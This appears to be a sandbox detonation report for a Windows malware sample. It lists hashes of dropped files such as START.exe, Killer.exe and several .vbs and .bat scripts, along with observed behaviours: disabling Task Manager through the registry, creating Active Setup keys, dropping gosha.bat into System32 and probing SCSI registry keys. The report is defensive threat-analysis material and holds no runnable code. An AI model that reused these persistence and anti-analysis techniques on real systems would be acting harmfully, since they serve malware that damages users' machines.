Files
C:\Users\Admin\AppData\Local\Temp\START.exe
| MD5 | b9e9b7fbd019b7e09e77bdec78ade264 |
| SHA1 | 0cdeda0e10d1f754d2171596d82e97e347089e01 |
| SHA256 | 227e8953a11d22ea948fe3b2426753a435993336ae1f49a6fe3c1dd0b70bf3b7 |
| SHA512 | d2e5dadb63d0ff75e48504720186483877ecde0354fe56d88255a079c116eef5b5c59eaef6ccc99217acce5d5755fd0a50fcf93b115f9408962535a572960a85 |
memory/4156-74-0x0000000000EB0000-0x0000000000ECB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSVCR100D.dll
| MD5 | 440e9fd9824b8e97d3ca2f34bd1bfbd1 |
| SHA1 | 6852b2c592b3794da114d6ac5ea9d083317bf5af |
| SHA256 | eddaa890ac6470692f76eee9586c06d727a1caf7a242170ab1a3947523927396 |
| SHA512 | b458a0838159367727a63e417bba7c12b196f4d4af56703fe77ddcb2c28c3b6aab1d62335c513398f92c225f204e32b437fb49316b7c2b537c1cf877653c2ef8 |
C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs
| MD5 | 8a25126b21c1f849b719999cb5d85e11 |
| SHA1 | 714fb5a246721c3117868c2229e7598ef7dfb2eb |
| SHA256 | 8ee9f21dd968d66fb71be502c6f2b96f3e0ee1954a4bcf2e7fffa45477fb7f38 |
| SHA512 | 8ea3d56e58410e369c42f6e16381ee802c8df58ee7f60ab937a19417e9a86f6877241ee7472df898bb85765d0bd3a5df2a58f97c717f5da8d32e7c8acf638c84 |
C:\Users\Admin\AppData\Local\Temp\Killer.exe
| MD5 | 32c1a77891071523637345563fcda855 |
| SHA1 | d582fa0290b7c04c99ded56c8ebc6e45df981300 |
| SHA256 | c8cb8941b2ebe27ba69600b8cb5725b9630fb631bd7c7e88dea9eebd8bd3bef3 |
| SHA512 | 61c6e7eddb5d8e880952c0fec6382082cbd33d0463ac556527598aaa6cf9bdb3755f395639d28be1a0cf4efa9f699cfdae06ecb5068b5f43b08b65354580704a |
memory/2920-82-0x0000000000AB0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msvcr100d.dll
| MD5 | c1fe947747fb29df287c1566dfd3a5c0 |
| SHA1 | 4f8243eb1bf6a06a13c7a375131b1476b9140adf |
| SHA256 | 3872ecdffe108283e4356280010355f857fc5dafa3e18b50021ec1acc51c4c57 |
| SHA512 | f180d5c8513d223853747540936cc63caa67ab2c85985b8a646d3689722a161b5b82e5e898d0c839ea41b1fed23f689b9e1da15b81b6712742d476854f6d4e9d |
C:\Users\Admin\AppData\Local\Temp\ZbDz.bat
| MD5 | 90716ec6d805a3e478c0a26477138efd |
| SHA1 | ceae2264e1c3c6a0bf715cf54237c3f763cd5799 |
| SHA256 | f185b92c729b011a051d2d8775eee998da9e71ba6156a8da81b0fc1b25c90a77 |
| SHA512 | fbda3613b691e83299077b1378aa845ab59befd61bc177e54b950f55c857c8e2b208012c026c24489f354c88404172ba25d7584f1b825ccd6880598bcc65cc56 |
C:\Users\Admin\AppData\Local\Temp\Collapse_all.js
| MD5 | f60e1a46f1e7301a7eb36f723cdec4b3 |
| SHA1 | 5e46742927659e3fb0cef6c67542cb5ec2b0926d |
| SHA256 | 5fdab6a87288b929290f603f813a254efa019d8fe6c73d8757ebc543ba6949eb |
| SHA512 | 945f7f053700cf18a80553e09c3d64c8481aeb70d871dd00106bf66fcb33b4360b4412cb4bf9391e4dfd8e6df92d11ffe896bee6f864bdbdddedc1877714ee16 |
C:\Users\Admin\AppData\Local\Temp\SHK.vbs
| MD5 | 2643272752b857cbc69d843d92ff4879 |
| SHA1 | 10f1f87652b5747dd37ed141734e5af39af19ef2 |
| SHA256 | 53c3cd2ed0f6184b2cf0304acfbef726c3415528c903c69a86f3f9405b52179c |
| SHA512 | 3e7d2548ccbe96599b94a585c6a02e2ee2820ac6a8aec1ede270c8089623c3c41fd779fdf5a93b2cd1b9fca3ef2d2b915703f3438c7abd6e27f5a59626f01282 |
C:\Users\Admin\AppData\Local\Temp\SHK.bat
| MD5 | ab921b5b6a2b7232c8d2fd2f0dc78790 |
| SHA1 | fe0c9c4e5255f903bf9b006f27a913f39a115a54 |
| SHA256 | dfd827c3e9bb39c84ca90001a7718c55458145fcf035b4dba1001b201422a8da |
| SHA512 | 47d8ded63fd55f4490d0cd64c8f688fc5bb5814018a09e46f1eae0e36228589f4097f88f2f42e92d02cc068fd3e807aae219a4c4162474a561b3767331e8f98e |
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
| MD5 | d2404ad25ee623edb58a175d4bb0c7a1 |
| SHA1 | 4ca3589e630abebffe46782f5941f6253001bea9 |
| SHA256 | 35ee2069ddde1c079b1890eafd7041f59eb5170063f3f308b0b808dcc24623ce |
| SHA512 | 26758e01881ccbfa5f124fb8fa15e1712d228ea1aa9e552dd5020436f55e4e83d450128e799aff829e6215eacfcb284133fdf3ca952696cadfe061477b8d0b8c |
memory/2588-91-0x0000000000440000-0x000000000045B000-memory.dmp
memory/4156-92-0x0000000000EB0000-0x0000000000ECB000-memory.dmp
memory/2920-93-0x0000000000AB0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
| MD5 | 7c3647e86215919ec06437d9a5fce95d |
| SHA1 | 7bc1a0582e03bd9d7ee5ba1d66268d800d66c596 |
| SHA256 | 39e30df6628702de8a548ff031383c360dfc63a9399169bb93838f7eef57a6ed |
| SHA512 | d0a4991ad1cff73dbd0425e9f7190101f27811daa622c0fa5ba620566a9f95caae4430b0386a6ea9a7575a56931a45ca821f5274f8d2798c73d5154c8fe7e33d |
memory/2060-96-0x0000000000620000-0x000000000063B000-memory.dmp
memory/2060-98-0x0000000000620000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
| MD5 | 4f5d56501b68860d79846d1c4a567459 |
| SHA1 | 548a514797c85e982a0f636030a18566895efaaa |
| SHA256 | 0df880855797fb52bcaac0e11074869ed409b9daaabfe8939ecd4039962292cd |
| SHA512 | 5efc549dcef528f0f5b09758ce18686106781788c0e78467d02fb12b7b138c0ca301d68e81305e7053f5471fa6c9c192d6bad81067fe70803e237b8dbf7d1f41 |
memory/980-101-0x0000000000D70000-0x0000000000D8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
| MD5 | d9c07b7bc1a4df56ecb73941aafa2d78 |
| SHA1 | 9d64ca9262852e3ee4b5e098e2762401364e80e8 |
| SHA256 | 506b80e8f8551e29fa1e93082fefc99ce6613ad7abae895d61bdda92f4dce8c3 |
| SHA512 | ca282eedf7851df48e0ae001684ca4400b6a43e14893610972496e7c4c7002c508b95278896176ef4d49d371d95b6cc759609313a833bcdbc010a064cb28170f |
memory/3612-106-0x0000000000710000-0x000000000072B000-memory.dmp
memory/980-107-0x0000000000D70000-0x0000000000D8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
| MD5 | 7cfd733ea3aedb94f04013881f8a9f14 |
| SHA1 | 94642432fd416ec32f1cd17dfd9b23922432dcea |
| SHA256 | fceb50190c036057c6386387ed115b83a9fec153332b80be4d891cb9ef8f624a |
| SHA512 | 8c2b83a6aa96bed630e950cb66cd3a50e4789f303b9f2f3f2f6043f16a3a26d7dc9a56aa43cb3af0e548b207d5a228b88eaacb0b1872fc8abd4e1191f465e323 |
memory/4644-111-0x0000000000120000-0x000000000013B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1eb86108cb8f5a956fdf48efbd5d06fe |
| SHA1 | 7b2b299f753798e4891df2d9cbf30f94b39ef924 |
| SHA256 | 1b53367e0041d54af89e7dd59733231f5da1393c551ed2b943c89166c0baca40 |
| SHA512 | e2a661437688a4a01a6eb3b2bd7979ecf96b806f5a487d39354a7f0d44cb693a3b1c2cf6b1247b04e4106cc816105e982569572042bdddb3cd5bec23b4fce29d |
\??\pipe\LOCAL\crashpad_4940_MLMOWQNPGQQWYWWG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f35bb0615bb9816f562b83304e456294 |
| SHA1 | 1049e2bd3e1bbb4cea572467d7c4a96648659cb4 |
| SHA256 | 05e80abd624454e5b860a08f40ddf33d672c3fed319aac180b7de5754bc07b71 |
| SHA512 | db9100f3e324e74a9c58c7d9f50c25eaa4c6c4553c93bab9b80c6f7bef777db04111ebcd679f94015203b240fe9f4f371cae0d4290ec891a4173c746ff4b11c1 |
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
| MD5 | dd799cfa99ea38299f32a744b4a9864c |
| SHA1 | 850457eea90f64bb760d078008f17799f8eb4843 |
| SHA256 | f9f469026252b2c7084755430c9b0d8939a8547b23a5bb32371102d7a3578ed1 |
| SHA512 | 9c74976ea217276bf5b291d629aa21ace989a45697748cb449eeba8d8c846e77e7ab66c1b701243ceb207db364d1abc376950c6b5f4cb92db068922ae41dcef3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bc9d8be2e42384192149e0e87b69b02f |
| SHA1 | d4296e6ca6d9ff008f2c16d8ea03e98854544ac3 |
| SHA256 | 599e467ce73a549198a24814f304bc2ec8018cf54c789789a049399ff3ea0a7e |
| SHA512 | 0f561256f5a5be9b81718ad1a566239e2b296f3a32064f0352b48f226013842fb2d3a55ed0086c325130d8aee0cfb0ed66bcb6c9c52f1591edbcbdedc6944c70 |
memory/4876-136-0x0000000000620000-0x0000000000621000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d92e4da4faae0e867d59569edf2d87b7 |
| SHA1 | 3e2a6fa09e2367869dd662c69e2ad2c1ea129f93 |
| SHA256 | 44bc65e3fc9de1cd5c75728ab9917927ad7bf1868db8a98103dc98523a55dc3a |
| SHA512 | 1b94ef986a964997f76fb97d7ab7b21daf4f5c9292200b9742b7e6a602b9b57f32c346ad982368484e4e29fdb37f8287014c10736b04d65be93e76887e359d99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 166d22894e297b9754dfe0668cd1f667 |
| SHA1 | 1e5b6d54d2382039bdfb1b67d3d9a5874473cd8e |
| SHA256 | d52a5a60e5cc00da16975119d72b28a4948d9bff9ddec114efdd49c126382b42 |
| SHA512 | 276eb84495182be248699e9c8fbb2196de81269778806e52ede806212ca0abfcfe320c808b14f3dd81a9b099bdf67652361a664d4074f8cfc53390be6087092c |
memory/4876-189-0x0000000000400000-0x0000000000468000-memory.dmp
memory/4644-190-0x0000000000120000-0x000000000013B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 09c29ec24437bf13a1de6d0993ec7092 |
| SHA1 | 7d11fec61b9db61974052c7585adefc63a17b420 |
| SHA256 | 7fe06033b73300a800c45d2d74760b2c24c8c60147416439f27f8cfad015fd5e |
| SHA512 | 7f89881d6309e72f57c27c2de802dea927e6f326230fdbb559335b58554dcca52ef07d34c28dd31138db55324b3888ba56d3b263fc78e0b542c7d05e3ff1077c |
memory/5096-214-0x0000000000440000-0x000000000045B000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
45s
Max time network
192s
Command Line
Signatures
Disables Task Manager via registry modification
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
